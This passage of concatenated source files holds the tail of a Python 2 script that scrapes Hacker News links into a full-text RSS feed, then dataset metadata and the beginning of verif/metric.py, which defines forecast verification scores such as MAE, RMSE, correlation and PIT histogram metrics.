	fewer than *minWords* spaces (i.e. roughly fewer words than that)."""
	for node in top.findAll(tag):
		if (node.renderContents().count(" ") < minWords):
			node.extract()
def killDivs(parent):
	"""Remove <div>s that look like boilerplate rather than body text.

	A div is dropped when its text has few commas (<10), contains no
	<pre>/<code>, and is dominated by images, list items, links or embeds
	rather than paragraphs.
	"""
	divs = parent.findAll("div")
	for d in divs:
		p = len(d.findAll("p"))
		img = len(d.findAll("img"))
		li = len(d.findAll("li"))
		a = len(d.findAll("a"))
		embed = len(d.findAll("embed"))
		pre = len(d.findAll("pre"))
		code = len(d.findAll("code"))
		if (d.renderContents().count(",") < 10):
			if ((pre == 0) and (code == 0)):
				if ((img > p ) or (li > p) or (a > p) or (p == 0) or (embed > 0)):
					d.extract()
def upgradeLink(link):
	"""Return the extracted article content for *link*, with a disk cache.

	HN-internal links and PDFs are skipped (returns ""). Results are
	cached under "upgraded/", keyed by the punctuation-stripped URL; on a
	network error (IOError) an empty string is returned.
	"""
	link = link.encode('utf-8')
	if (not (link.startswith("http://news.ycombinator.com") or link.endswith(".pdf"))):
		linkFile = "upgraded/" + re.sub(PUNCTUATION, "_", link)
		if (os.path.exists(linkFile)):
			return open(linkFile).read()
		else:
			content = ""
			try:
				html = urllib.urlopen(link).read()
				content = grabContent(link, html)
				filp = open(linkFile, "w")
				filp.write(content)
				filp.close()
			except IOError:
				pass
			return content
	else:
		return ""
def upgradeFeed(feedUrl):
	"""Fetch the HN RSS feed and rebuild it with the full article content
	inlined into each item's description (links to comments kept)."""
	feedData = urllib.urlopen(feedUrl).read()
	upgradedLinks = []
	parsedFeed = feedparser.parse(feedData)
	for entry in parsedFeed.entries:
		upgradedLinks.append((entry, upgradeLink(entry.link)))
	rss = """<rss version="2.0">
<channel>
<title>Hacker News</title>
<link>http://news.ycombinator.com/</link>
<description>Links for the intellectually curious, ranked by readers.</description>
"""
	for entry, content in upgradedLinks:
		rss += u"""
<item>
<title>%s</title>
<link>%s</link>
<comments>%s</comments>
<description>
<![CDATA[<a href="%s">Comments</a><br/>%s<br/><a href="%s">Comments</a>]]>
</description>
</item>
""" % (entry.title, escape(entry.link), escape(entry.comments), entry.comments, content.decode('utf-8'), entry.comments)
	rss += """
</channel>
</rss>"""
	return rss
if __name__ == "__main__":
	# Emit the upgraded feed XML to (utf-8-wrapped) stdout.
	print upgradeFeed(HN_RSS_FEED)
| [
"geniuspriyansh@gmail.com"
] | geniuspriyansh@gmail.com |
f23c206436ec78827ec7cbc0ab57a7c924a38e64 | 70087a0720037639297825a66135b9c985bbf586 | /verif/metric.py | 93c65c9b670eb008b0ef357dbd97079fe6539478 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rvalenzuelar/verif | 1ab854e2433a69378af8a867a1fb6f0efd1a4de0 | 034188cabd3a29136433be2ecb2f6555d3c03da8 | refs/heads/master | 2020-03-30T21:39:27.128496 | 2018-05-13T16:04:38 | 2018-05-13T17:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,947 | py | import inspect
import metric_type
import numpy as np
import sys
import scipy.stats
import verif.aggregator
import verif.axis
import verif.interval
import verif.util
def get_all():
   """
   Returns a list of (class name, class object) tuples for every class
   defined in this module, as produced by inspect.getmembers.

   Note: despite earlier documentation claiming a dictionary, this has
   always been a list of tuples — callers index entries with [0]/[1].
   """
   return inspect.getmembers(sys.modules[__name__], inspect.isclass)
def get_all_by_type(type):
   """
   Like get_all, except only return metrics that are of a certain
   verif.metric_type
   """
   return [entry for entry in get_all() if entry[1].type == type]
def get_all_obs_fcst_based():
   """ Like get_all, except only return obs-fcst-based metric classes """
   return [entry for entry in get_all()
         if issubclass(entry[1], verif.metric.ObsFcstBased)]
def get(name):
   """ Returns an instance of an object with the given class name """
   instance = None
   for class_name, metric_class in get_all():
      # Deliberately no break: as before, the last valid match wins.
      if name == class_name.lower() and metric_class.is_valid():
         instance = metric_class()
   return instance
def get_p(data, input_index, axis, axis_index, interval):
   """
   Retrieves and computes forecast probability and verifying observation for
   being inside interval
   Returns:
      obs (np.array): 1 (True) where the observation falls inside interval
      p (np.array): forecast probability of being inside interval, computed
         as the difference of the CDF values at the interval bounds
   """
   # CDF values at the interval edges; defaults correspond to open bounds
   # (P(X < -inf) = 0, P(X < inf) = 1).
   p0 = 0
   p1 = 1
   if interval.lower != -np.inf and interval.upper != np.inf:
      var0 = verif.field.Threshold(interval.lower)
      var1 = verif.field.Threshold(interval.upper)
      [obs, p0, p1] = data.get_scores([verif.field.Obs(), var0, var1],
            input_index, axis, axis_index)
   elif interval.lower != -np.inf:
      var0 = verif.field.Threshold(interval.lower)
      [obs, p0] = data.get_scores([verif.field.Obs(), var0], input_index,
            axis, axis_index)
   elif interval.upper != np.inf:
      var1 = verif.field.Threshold(interval.upper)
      [obs, p1] = data.get_scores([verif.field.Obs(), var1], input_index,
            axis, axis_index)
   # NOTE(review): if both bounds are infinite, none of the branches above
   # assigns `obs` and the next line raises NameError — presumably callers
   # never pass a fully unbounded interval; confirm.
   obsP = interval.within(obs)
   p = p1 - p0 # Prob of obs within range
   return [obsP, p]
def get_q(data, input_index, axis, axis_index, interval):
   """
   Retrieve forecast quantile and verifying observation

   Arguments:
      data (verif.data.Data): data object to read fields from
      input_index (int): input (file) index to retrieve for
      axis (verif.axis.Axis): axis to slice along
      axis_index (int): index of the slice along the axis
      interval (verif.interval.Interval): interval.lower is used as the
         quantile level to retrieve

   Returns:
      obs (np.array): observations
      q (np.array): forecast quantiles for level interval.lower
   """
   # Removed dead locals p0/p1 and the docstring copied from get_p: this
   # function never computes interval membership.
   var = verif.field.Quantile(interval.lower)
   [obs, q] = data.get_scores([verif.field.Obs(), var], input_index, axis, axis_index)
   return [obs, q]
class Metric(object):
   """ Class to compute a score for a verification metric

   Scores are computed by retrieving information from a verif.data.Data object.
   As data is organized in multiple dimensions, scores are computed for a
   particular verif.axis.Axis. Also data objects have several input files, so
   scores are computed for a particular input.

   The ObsFcstBased class offers a simple way to design a metric that only
   uses observations and forecasts from data.

   Class attributes:
      description (str): A short one-liner describing the metric. This will show
         up in the main verif documentation.
      long (str): A longer description. This will show up in the
         documentation when a specific metric is chosen.
      min (float): Minimum possible value the metric can take on. None if no min.
      max (float): Maximum possible value the metric can take on. None if no max.
      require_threshold_type (str) : What type of thresholds does this metric
         require? One of 'None', 'deterministic', 'threshold', 'quantile'.
      supports_threshold (bool) : Does it make sense to use '-x threshold' with this metric?
      supports_field (bool) : Does it make sense to use '-x obs' or '-x fcst' with this metric?
      orientation (int): 1 for a positively oriented score (higher values are better),
         -1 for negative, and 0 for all others
      reference (str): A string with an academic reference
      supports_aggregator: Does this metric use self.aggregator?
      type (verif.metric_type.MetricType): What type of metric is this?

   To implement a new metric:
      Fill out cls.description and implement compute_core(). The other class
      attributes (see above) are optional.
   """
   # This must be overloaded
   description = None

   # Default values
   long = None
   reference = None
   orientation = 0
   min = None
   max = None
   default_axis = verif.axis.Leadtime()  # If no axis is specified, use this axis as default
   default_bin_type = None
   require_threshold_type = None
   supports_threshold = False
   supports_field = False
   perfect_score = None
   aggregator = verif.aggregator.Mean()
   supports_aggregator = False
   type = verif.metric_type.Deterministic()

   def compute(self, data, input_index, axis, interval):
      """ Compute the score along an axis

      Arguments:
         data (verif.data.Data): data object to get information from
         input_index (int): input index to compute the result for
         axis (verif.axis.Axis): Axis to compute score for for
         interval: Compute score for this interval (only applies to some metrics)

      Returns:
         np.array: A 1D numpy array of one score for each slice along axis
      """
      size = data.get_axis_size(axis)
      scores = np.zeros(size, 'float')

      # Loop through axis indices
      for axis_index in range(0, size):
         x = self.compute_single(data, input_index, axis, axis_index, interval)
         scores[axis_index] = x
      return scores

   def compute_single(self, data, input_index, axis, axis_index, interval):
      """ Computes the score for a given slice

      Arguments:
         data (verif.data.Data): data object to get information from
         input_index (int): input index to compute the result for
         axis (verif.axis.Axis): Axis to compute score for for
         axis_index (int): Slice along the axis
         interval: Compute score for this interval (only applies to some metrics)

      Returns:
         float: Value representing the score for the slice
      """
      raise NotImplementedError()

   def label(self, variable):
      """ What is an appropriate y-axis label for this metric? Override this if
      the metric does not have the same units as the forecast variable """
      return self.name + " (" + variable.units + ")"

   class ClassProperty(property):
      # Allows 'name' to be accessed as a property on the class itself
      def __get__(self, cls, owner):
         return self.fget.__get__(None, owner)()

   @ClassProperty
   @classmethod
   def name(cls):
      """ Use the class name as default
      """
      return cls.get_class_name()

   @classmethod
   def is_valid(cls):
      """ Is this a valid metric that can be initialized? """
      return cls.description is not None

   @classmethod
   def help(cls):
      """ Build a human-readable, multi-line help string for this metric """
      s = ""
      if cls.description is not None:
         s = cls.description
      # BUGFIX: was 'cls.orientation is not 0', an identity (not value)
      # comparison, which is implementation-dependent and a SyntaxWarning
      # on Python >= 3.8
      if cls.orientation != 0:
         s = s + "\n" + verif.util.green("Orientation: ")
         if cls.orientation == 1:
            s = s + "Positive (higher values are better)"
         elif cls.orientation == -1:
            s = s + "Negative (lower values are better)"
         else:
            s = s + "None"
      if cls.perfect_score is not None:
         s = s + "\n" + verif.util.green("Perfect score: ") + str(cls.perfect_score)
      if cls.min is not None:
         s = s + "\n" + verif.util.green("Minimum value: ") + str(cls.min)
      if cls.max is not None:
         s = s + "\n" + verif.util.green("Maximum value: ") + str(cls.max)
      if cls.long is not None:
         s = s + "\n" + verif.util.green("Description: ") + cls.long
      if cls.reference is not None:
         s = s + "\n" + verif.util.green("Reference: ") + cls.reference
      return s

   @classmethod
   def get_class_name(cls):
      name = cls.__name__
      return name
class ObsFcstBased(Metric):
   """ Base class for scores computed from observations and deterministic
   forecasts alone """
   type = verif.metric_type.Deterministic()
   supports_field = True

   def compute_single(self, data, input_index, axis, axis_index, interval):
      obs, fcst = data.get_scores([verif.field.Obs(), verif.field.Fcst()],
            input_index, axis, axis_index)
      assert(obs.shape[0] == fcst.shape[0])

      # When scoring against an obs/fcst axis, keep only the pairs whose
      # axis variable falls inside the interval
      if axis == verif.axis.Obs():
         keep = np.where(interval.within(obs))
         obs = obs[keep]
         fcst = fcst[keep]
      elif axis == verif.axis.Fcst():
         keep = np.where(interval.within(fcst))
         obs = obs[keep]
         fcst = fcst[keep]
      return self.compute_from_obs_fcst(obs, fcst, interval)

   def compute_from_obs_fcst(self, obs, fcst, interval=None):
      """ Compute the score using only the observations and forecasts

      obs and fcst must have the same length, but may contain nan values

      Arguments:
         obs (np.array): 1D array of observations
         fcst (np.array): 1D array of forecasts

      Returns:
         float: Value of score
      """
      # Drop pairs where either member is missing
      valid = np.where((np.isnan(obs) | np.isnan(fcst)) == 0)[0]
      if len(valid) == 0:
         return np.nan
      return self._compute_from_obs_fcst(obs[valid], fcst[valid])

   def _compute_from_obs_fcst(self, obs, fcst):
      """ Compute the score

      Obs and fcst are guaranteed to:
         - have the same length
         - length >= 1
         - no missing values
      """
      raise NotImplementedError()
class FromField(Metric):
   """ Generic metric that aggregates the values of a single field """
   supports_aggregator = True
   supports_field = True

   def __init__(self, field, aux=None):
      """ Compute scores from a field

      Arguments:
         field (verif.field.field): Retrive data from this field
         aux (verif.field.Field): When reading field, also pull values for
            this field to ensure only common data points are returned
      """
      self._field = field
      self._aux = aux

   def compute_single(self, data, input_index, axis, axis_index, interval):
      fields = [self._field]
      # Position (in 'fields') of the field used for interval subsetting,
      # when scoring along an obs/fcst axis
      axis_pos = None
      if axis == verif.axis.Obs():
         if self._field != verif.field.Obs():
            fields += [verif.field.Obs()]
         axis_pos = len(fields) - 1
      elif axis == verif.axis.Fcst():
         if self._field != verif.field.Fcst():
            fields += [verif.field.Fcst()]
         axis_pos = len(fields) - 1
      # Fetch aux alongside so that only common data points are returned
      if self._aux is not None:
         fields += [self._aux]
      values_array = data.get_scores(fields, input_index, axis, axis_index)
      values = values_array[0]

      # Subset if we have a subsetting axis
      if axis_pos is not None:
         I = np.where(interval.within(values_array[axis_pos]))[0]
         values = values[I]

      return self.aggregator(values)

   def label(self, variable):
      return self.aggregator.name().title() + " of " + self._field.name()
class Obs(FromField):
   """ Retrives the observation

   Note: This cannot be a subclass of ObsFcstBased, since we don't want
   to remove obs for which the forecasts are missing. Same for Fcst.
   """
   type = verif.metric_type.Deterministic()
   name = "Observation"
   description = "Observed value"
   supports_aggregator = True
   orientation = 0

   def __init__(self):
      super(Obs, self).__init__(verif.field.Obs())

   def label(self, variable):
      return "%s of observation (%s)" % (self.aggregator.name().title(), variable.units)
class Fcst(FromField):
   """ Retrieves the deterministic forecast """
   type = verif.metric_type.Deterministic()
   name = "Forecast"
   description = "Forecasted value"
   supports_aggregator = True
   orientation = 0

   def __init__(self):
      super(Fcst, self).__init__(verif.field.Fcst())

   def label(self, variable):
      return "%s of forecast (%s)" % (self.aggregator.name().title(), variable.units)
class Mae(ObsFcstBased):
   """ Mean absolute error of the forecasts """
   description = "Mean absolute error"
   min = 0
   perfect_score = 0
   supports_aggregator = True
   orientation = -1
   name = "Mean absolute error"

   def _compute_from_obs_fcst(self, obs, fcst):
      # Aggregate (default: mean) the absolute errors
      return self.aggregator(np.abs(obs - fcst))

   def label(self, variable):
      return "MAE (%s)" % variable.units
class Bias(ObsFcstBased):
   """ Aggregated difference between forecast and observation """
   name = "Bias"
   description = "Bias (forecast - observation)"
   perfect_score = 0
   supports_aggregator = True
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      errors = fcst - obs
      return self.aggregator(errors)
class Diff(ObsFcstBased):
   """ Difference of the aggregated forecast and aggregated observation """
   name = "Diff"
   description = "Difference in aggregated statistics (agg(forecast) - agg(observation))"
   perfect_score = 0
   supports_aggregator = True
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      agg_fcst = self.aggregator(fcst)
      agg_obs = self.aggregator(obs)
      return agg_fcst - agg_obs
class Ratio(ObsFcstBased):
   """ Ratio of the aggregated forecast to the aggregated observation """
   name = "Ratio"
   description = "Ratio of aggregated statistics (agg(forecast) / agg(observation))"
   perfect_score = 1
   supports_aggregator = True
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      denominator = self.aggregator(obs)
      # Guard against division by zero
      if denominator == 0:
         return np.nan
      return self.aggregator(fcst) / denominator

   def label(self, variable):
      return "Ratio"
class Ef(ObsFcstBased):
   """ Fraction of cases where the forecast exceeds the observation """
   name = "Exceedance fraction"
   description = "Exeedance fraction: fraction of times that forecasts > observations"
   min = 0
   max = 1
   perfect_score = 0.5
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      # Mean of the boolean exceedance indicator equals the fraction
      return np.mean(obs < fcst)

   def label(self, variable):
      return "Fraction fcst > obs"
class StdError(ObsFcstBased):
   """ Standard deviation of the error, i.e. RMSE with the bias removed """
   name = "Standard error"
   description = "Standard error (i.e. RMSE if forecast had no bias)"
   min = 0
   perfect_score = 0
   orientation = -1

   def _compute_from_obs_fcst(self, obs, fcst):
      error = obs - fcst
      # Subtract the mean error before computing the RMS
      return np.sqrt(np.mean((error - np.mean(error)) ** 2))
class Rmse(ObsFcstBased):
   """ Root mean squared error of the forecasts """
   name = "Root mean squared error"
   description = "Root mean squared error"
   min = 0
   perfect_score = 0
   supports_aggregator = True
   orientation = -1

   def _compute_from_obs_fcst(self, obs, fcst):
      squared_errors = (obs - fcst) ** 2
      return np.sqrt(self.aggregator(squared_errors))

   def label(self, variable):
      return "RMSE (%s)" % variable.units
class Rmsf(ObsFcstBased):
   """ Root mean squared factor, a multiplicative analogue of RMSE """
   name = "Root mean squared factor"
   description = "Root mean squared factor"
   min = 0
   perfect_score = 1
   supports_aggregator = True
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      # RMS of the log of the fcst/obs ratios, transformed back
      log_ratios = np.log(fcst / obs)
      return np.exp(self.aggregator(log_ratios ** 2) ** 0.5)

   def label(self, variable):
      return "RMSF (%s)" % variable.units
class Cmae(ObsFcstBased):
   """ Cube-root of the mean absolute cubic error """
   name = "Cube-root mean absolute cubic error"
   description = "Cube-root mean absolute cubic error"
   min = 0
   perfect_score = 0
   supports_aggregator = True
   orientation = -1

   def _compute_from_obs_fcst(self, obs, fcst):
      cubic_errors = np.abs(obs ** 3 - fcst ** 3)
      return self.aggregator(cubic_errors) ** (1.0 / 3)

   def label(self, variable):
      return "CMAE (%s)" % variable.units
class Nsec(ObsFcstBased):
   """ Nash-Sutcliffe model efficiency coefficient """
   name = "Nash-Sutcliffe efficiency coefficient"
   description = "Nash-Sutcliffe efficiency coefficient"
   min = 0
   max = 1
   perfect_score = 1
   orientation = 1

   def _compute_from_obs_fcst(self, obs, fcst):
      obs_mean = np.mean(obs)
      denom = np.sum((obs - obs_mean) ** 2)
      # Undefined when observations have no variance
      if denom == 0:
         return np.nan
      return 1 - np.sum((fcst - obs) ** 2) / denom

   def label(self, variable):
      return "NSEC"
class Alphaindex(ObsFcstBased):
   """ Alpha index comparing anomaly errors to total anomaly variance """
   name = "Alpha index"
   description = "Alpha index"
   perfect_score = 0
   orientation = -1
   max = 2
   min = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      obs_mean = np.mean(obs)
      fcst_mean = np.mean(fcst)
      denom = np.sum((fcst - fcst_mean) ** 2 + (obs - obs_mean) ** 2)
      # Undefined when neither series has variance
      if denom == 0:
         return np.nan
      num = np.sum((fcst - obs - fcst_mean + obs_mean) ** 2)
      return 1 - num / denom

   def label(self, variable):
      return self.name
class Leps(ObsFcstBased):
   """ Linear error in probability space: mean absolute difference between
   the forecast and observation expressed as empirical quantiles of the
   observed distribution """
   name = "Linear error in probability space"
   description = "Linear error in probability space"
   min = 0
   perfect_score = 0
   orientation = -1

   def _compute_from_obs_fcst(self, obs, fcst):
      N = len(obs)
      # Compute obs quantiles
      # NOTE(review): this assigns position i the *index of the i-th smallest
      # obs* divided by N, not the rank of obs[i]; a rank (argsort of argsort)
      # may have been intended -- confirm before changing behavior.
      Iobs = np.array(np.argsort(obs), 'float')
      qobs = Iobs / N

      # Compute the quantiles that the forecasts are relative
      # to the observations
      qfcst = np.zeros(N, 'float')
      sortobs = np.sort(obs)
      for i in range(0, N):
         I = np.where(fcst[i] < sortobs)[0]
         # BUGFIX: was 'if len(I > 0):' which only worked by accident
         # (len of the boolean array equals len(I))
         if len(I) > 0:
            qfcst[i] = float(I[0]) / N
         else:
            qfcst[i] = 1
      return np.mean(abs(qfcst - qobs))

   def label(self, variable):
      return "LEPS"
class Dmb(ObsFcstBased):
   """ Degree of mass balance: ratio of mean obs to mean forecast """
   name = "Degree of mass balance"
   description = "Degree of mass balance (obs/fcst)"
   perfect_score = 1
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      mean_obs = np.mean(obs)
      mean_fcst = np.mean(fcst)
      return mean_obs / mean_fcst

   def label(self, variable):
      return self.description
class Mbias(ObsFcstBased):
   """ Multiplicative bias: ratio of mean forecast to mean observation """
   name = "Multiplicative bias"
   description = "Multiplicative bias (fcst/obs)"
   perfect_score = 1
   orientation = 0

   def _compute_from_obs_fcst(self, obs, fcst):
      mean_obs = np.nanmean(obs)
      # Guard against division by zero
      if mean_obs == 0:
         return np.nan
      return np.nanmean(fcst) / mean_obs

   def label(self, variable):
      return self.description
class Corr(ObsFcstBased):
   """ Pearson correlation between observations and forecasts """
   name = "Correlation"
   description = "Correlation between observations and forecasts"
   min = 0  # Technically -1, but values below 0 are not as interesting
   max = 1
   perfect_score = 1
   orientation = 1

   def _compute_from_obs_fcst(self, obs, fcst):
      # Undefined for a single pair or a constant forecast
      if len(obs) <= 1 or np.var(fcst) == 0:
         return np.nan
      return np.corrcoef(obs, fcst)[1, 0]

   def label(self, variable):
      return self.name
class RankCorr(ObsFcstBased):
   """ Spearman rank correlation between observations and forecasts """
   name = "Rank correlation"
   description = "Rank correlation between observations and forecasts"
   min = 0  # Technically -1, but values below 0 are not as interesting
   max = 1
   perfect_score = 1
   orientation = 1

   def _compute_from_obs_fcst(self, obs, fcst):
      # Undefined for a single pair
      if len(obs) <= 1:
         return np.nan
      rho, _ = scipy.stats.spearmanr(obs, fcst)
      return rho

   def label(self, variable):
      return self.name
class KendallCorr(ObsFcstBased):
   """ Kendall tau rank correlation between observations and forecasts """
   name = "Kendall correlation"
   description = "Kendall correlation between observations and forecasts"
   min = 0  # Technically -1, but values below 0 are not as interesting
   max = 1
   perfect_score = 1
   orientation = 1

   def _compute_from_obs_fcst(self, obs, fcst):
      # Undefined for a single pair or a constant forecast
      if len(obs) <= 1 or np.var(fcst) == 0:
         return np.nan
      tau, _ = scipy.stats.kendalltau(obs, fcst)
      return tau

   def label(self, variable):
      return self.name
class DError(ObsFcstBased):
   """ Mean absolute difference between the sorted observation and sorted
   forecast distributions """
   name = "Distribution Error"
   description = "Distribution error"
   min = 0
   perfect_score = 0
   supports_aggregator = False
   orientation = -1

   def _compute_from_obs_fcst(self, obs, fcst):
      # Compare the two marginal distributions value-by-value after sorting
      return np.mean(np.abs(np.sort(obs) - np.sort(fcst)))
class Pit(Metric):
   """ Retrives the PIT-value corresponding to the observation """
   type = verif.metric_type.Probabilistic()
   name = "Probability integral transform"
   description = "Verifying PIT-value (CDF at observation)"
   supports_aggregator = True
   orientation = 0

   def compute_single(self, data, input_index, axis, axis_index, interval):
      pit_values = data.get_scores(verif.field.Pit(), input_index, axis, axis_index)
      return self.aggregator(pit_values)

   def label(self, variable):
      return "%s of verifying PIT" % self.aggregator.name().title()
class PitHistDev(Metric):
   """ Measures how far the PIT histogram deviates from flatness, normalized
   by the deviation expected from sampling noise alone """
   type = verif.metric_type.Probabilistic()
   name = "PIT histogram deviation factor"
   description = "PIT histogram deviation factor (actual deviation / expected deviation)"
   min = 0
   # max = 1
   perfect_score = 1
   orientation = -1

   def __init__(self, numBins=11, field=verif.field.Pit()):
      # numBins: number of bin edges (so numBins - 1 histogram bins)
      # field: which PIT-like field to read from data
      self._bins = np.linspace(0, 1, numBins)
      self._field = field

   def compute_single(self, data, input_index, axis, axis_index, interval):
      pit = data.get_scores(self._field, input_index, axis, axis_index)
      nb = len(self._bins) - 1
      # Ratio of actual histogram deviation to the deviation a perfectly
      # calibrated (flat) histogram would show by chance
      D = self.deviation(pit, nb)
      D0 = self.expected_deviation(pit, nb)
      dev = D / D0
      return dev

   def label(self, variable):
      return self.name

   @staticmethod
   def expected_deviation(values, numBins):
      """ Deviation expected for a flat histogram due to sampling noise """
      if len(values) == 0 or numBins == 0:
         return np.nan
      return np.sqrt((1.0 - 1.0 / numBins) / (len(values) * numBins))

   @staticmethod
   def deviation(values, numBins):
      """ RMS deviation of the normalized histogram from a flat histogram """
      if len(values) == 0 or numBins == 0:
         return np.nan
      x = np.linspace(0, 1, numBins + 1)
      n = np.histogram(values, x)[0]
      n = n * 1.0 / sum(n)
      return np.sqrt(1.0 / numBins * np.sum((n - 1.0 / numBins) ** 2))

   @staticmethod
   def deviation_std(values, numBins):
      """ Standard deviation of the per-bin frequency under a flat histogram
      (binomial sampling) """
      if len(values) == 0 or numBins == 0:
         return np.nan
      n = len(values)
      p = 1.0 / numBins
      numPerBinStd = np.sqrt(n * p * (1 - p))
      std = numPerBinStd / n
      return std

   # What reduction in ignorance is possible by calibrating the PIT-histogram?
   @staticmethod
   def ignorance_potential(values, numBins):
      if len(values) == 0 or numBins == 0:
         return np.nan
      x = np.linspace(0, 1, numBins + 1)
      n = np.histogram(values, x)[0]
      n = n * 1.0 / sum(n)
      expected = 1.0 / numBins
      # KL-divergence (base 2) of the histogram from uniform
      ign = np.sum(n * np.log2(n / expected)) / sum(n)
      return ign
class PitHistSlope(Metric):
   """ Average slope of the PIT histogram; positive means too many obs in the
   higher ranks """
   type = verif.metric_type.Probabilistic()
   name = "PIT histogram slope"
   description = "Average slope of the PIT histogram. Positive mean too many obs in the higher ranks."
   perfect_score = 0
   orientation = 0

   def __init__(self, numBins=11, field=verif.field.Pit()):
      self._bins = np.linspace(0, 1, numBins)
      self._field = field

   def compute_single(self, data, input_index, axis, axis_index, interval):
      # Create a PIT histogram, then compute the average slope across the bars
      pit = data.get_scores(self._field, input_index, axis, axis_index)
      counts = np.histogram(pit, self._bins)[0]
      freq = counts * 1.0 / sum(counts)
      bin_centers = (self._bins[1:] + self._bins[0:-1]) / 2
      slopes = np.diff(freq) / np.diff(bin_centers)
      return np.mean(slopes)

   def label(self, variable):
      return self.name
class PitHistShape(Metric):
   """ Second derivative of the PIT histogram; negative means U-shaped """
   type = verif.metric_type.Probabilistic()
   name = "PIT histogram shape"
   description = "Second derivative of the PIT histogram. Negative means U-shaped."
   perfect_score = 0
   orientation = 0

   def __init__(self, numBins=11, field=verif.field.Pit()):
      self._bins = np.linspace(0, 1, numBins)
      self._field = field

   def compute_single(self, data, input_index, axis, axis_index, interval):
      # Create a PIT histogram, then compute the second derivative across the bars
      pit = data.get_scores(self._field, input_index, axis, axis_index)
      counts = np.histogram(pit, self._bins)[0]
      freq = counts * 1.0 / sum(counts)
      bin_centers = (self._bins[1:] + self._bins[0:-1]) / 2
      # First derivative between adjacent bars
      first_deriv = np.diff(freq) / np.diff(bin_centers)
      # Second derivative between adjacent first-derivative points
      deriv_centers = (bin_centers[1:] + bin_centers[0:-1]) / 2
      second_deriv = np.diff(first_deriv) / np.diff(deriv_centers)
      return np.mean(second_deriv)

   def label(self, variable):
      return self.name
class MarginalRatio(Metric):
   """ Ratio of the observed event frequency to the mean forecast probability
   of the event defined by the interval """
   type = verif.metric_type.Probabilistic()
   name = "Marginal ratio"
   description = "Ratio of marginal probability of obs to marginal" \
         " probability of fcst. Use -r to specify thresholds."
   min = 0
   perfect_score = 1
   require_threshold_type = "threshold"
   supports_threshold = True
   default_axis = verif.axis.Threshold()
   orientation = 0

   def compute_single(self, data, input_index, axis, axis_index, interval):
      # p0/p1: forecast CDF at the interval's lower/upper endpoints.
      # Handle half-open intervals by substituting a constant 0 or 1.
      if np.isinf(interval.lower):
         pvar = verif.field.Threshold(interval.upper)
         [obs, p1] = data.get_scores([verif.field.Obs(), pvar], input_index, axis, axis_index)
         p0 = 0 * p1
      elif np.isinf(interval.upper):
         pvar = verif.field.Threshold(interval.lower)
         [obs, p0] = data.get_scores([verif.field.Obs(), pvar], input_index,
               axis, axis_index)
         p1 = 0 * p0 + 1
      else:
         pvar0 = verif.field.Threshold(interval.lower)
         pvar1 = verif.field.Threshold(interval.upper)
         [obs, p0, p1] = data.get_scores([verif.field.Obs(), pvar0, pvar1],
               input_index, axis, axis_index)
      obs = interval.within(obs)
      p = p1 - p0
      # Undefined when no forecast probability mass falls in the interval
      if np.mean(p) == 0:
         return np.nan
      return np.mean(obs) / np.mean(p)

   def label(self, variable):
      return "Ratio of marginal probs: Pobs/Pfcst"
class Within(Metric):
   """ The percentage of forecasts within some error bound

   Can't be a subclass of ObsFcstBased, because it depends on threshold.
   """
   # FIX: the docstring used to appear after 'type =', making it a no-op
   # string expression instead of the class docstring
   type = verif.metric_type.Deterministic()
   name = "Within"
   description = "The percentage of forecasts within some error bound. Use -r to specify error bounds"
   min = 0
   max = 100
   default_bin_type = "below"
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = 100
   orientation = 0

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obs, fcst] = data.get_scores([verif.field.Obs(),
         verif.field.Fcst()], input_index, axis, axis_index)
      return self.compute_from_obs_fcst(obs, fcst, interval)

   def compute_from_obs_fcst(self, obs, fcst, interval):
      """ Percentage of absolute errors falling inside the interval """
      diff = abs(obs - fcst)
      return np.mean(interval.within(diff)) * 100

   def label(self, variable):
      return "% of forecasts"
class Conditional(Metric):
   """
   Computes the mean y conditioned on x. For a given range of x-values, what is
   the average y-value?
   """
   type = verif.metric_type.Deterministic()
   orientation = 0

   def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.mean):
      self._x = x
      self._y = y
      self._func = func

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
      return self.compute_from_obs_fcst(obs, fcst, interval)

   def compute_from_obs_fcst(self, obs, fcst, interval):
      # Restrict to cases where the conditioning variable is inside the interval
      matches = np.where(interval.within(obs))[0]
      if len(matches) == 0:
         return np.nan
      return self._func(fcst[matches])
class XConditional(Metric):
   """
   Mean x when conditioned on x. Average x-value that is within a given range.
   The reason the y-variable is added is to ensure that the same data is used
   for this metric as for the Conditional metric.
   """
   type = verif.metric_type.Deterministic()
   orientation = 0

   def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.median):
      self._x = x
      self._y = y
      self._func = func

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
      return self.compute_from_obs_fcst(obs, fcst, interval)

   def compute_from_obs_fcst(self, obs, fcst, interval):
      # Summarize the conditioning variable itself over the matching cases
      matches = np.where(interval.within(obs))[0]
      if len(matches) == 0:
         return np.nan
      return self._func(obs[matches])
class Count(Metric):
   """
   Counts how many values of a specific variable is within the threshold range
   Not a real metric.
   """
   type = verif.metric_type.Deterministic()
   orientation = 0

   def __init__(self, x):
      self._x = x

   def compute_single(self, data, input_index, axis, axis_index, interval):
      values = data.get_scores(self._x, input_index, axis, axis_index)
      matches = np.where(interval.within(values))[0]
      # Report nan (not 0) when nothing matches
      if len(matches) == 0:
         return np.nan
      return len(matches)
class Quantile(Metric):
   """ Mean value of a specific forecast quantile """
   type = verif.metric_type.Probabilistic()
   min = 0
   max = 1

   def __init__(self, quantile):
      # Quantile level to retrieve
      self._quantile = quantile

   def compute_single(self, data, input_index, axis, axis_index, interval):
      field = verif.field.Quantile(self._quantile)
      values = data.get_scores(field, input_index, axis, axis_index)
      return verif.util.nanmean(values)
class Bs(Metric):
